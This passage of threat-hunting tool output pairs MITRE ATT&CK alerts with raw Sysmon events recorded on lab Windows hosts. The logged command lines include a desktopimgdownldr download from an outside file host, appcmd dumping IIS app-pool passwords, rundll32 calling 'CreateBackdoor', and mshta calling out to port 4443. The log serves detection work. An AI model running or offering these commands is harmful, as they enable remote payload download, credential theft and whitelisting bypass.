<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
<Data Name=""ProcessGuid"">747F3D96-51FE-5F93-0000-0010DC535E00</Data>
<Data Name=""ProcessId"">8920</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd</Data>
<Data Name=""CurrentDirectory"">C:\PROGRA~3\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ParentProcessId"">7504</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.282154Z"">
</TimeCreated>
<EventRecordID>5919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.232</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00108C8EFF00</Data>
<Data Name=""ProcessId"">3144</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-03T08:47:20.037922Z"">
</TimeCreated>
<EventRecordID>305352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3324"" ThreadID=""4016"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-03 08:47:20.001</Data>
<Data Name=""ProcessGuid"">747F3D96-F098-5EFE-0000-001012E13801</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1CE4-5EFE-0000-0020CC9C0800</Data>
<Data Name=""LogonId"">0x89ccc</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-EF3D-5EFE-0000-0010F3653401</Data>
<Data Name=""ParentProcessId"">5384</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:13:44.106609Z"">
</TimeCreated>
<EventRecordID>7649</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2088"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:13:42.577</Data>
<Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
<Data Name=""ProcessId"">652</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.13</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49159</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.18</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">4443</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-03T20:39:30.254733Z"">
</TimeCreated>
<EventRecordID>8352</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""112"" ThreadID=""2084"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-03 20:39:30.254</Data>
<Data Name=""ProcessGuid"">365ABB72-1282-5D1D-0000-0010DD401B00</Data>
<Data Name=""ProcessId"">2328</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-0A6F-5D1D-0000-0020CA350100</Data>
<Data Name=""LogonId"">0x135ca</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1256-5D1D-0000-0010FB1A1B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\notepad.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:28.374373Z"">
</TimeCreated>
<EventRecordID>4917</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.222</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001062788800</Data>
<Data Name=""ProcessId"">2040</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.202039Z"">
</TimeCreated>
<EventRecordID>5916</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.161</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010CC8AFF00</Data>
<Data Name=""ProcessId"">2524</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
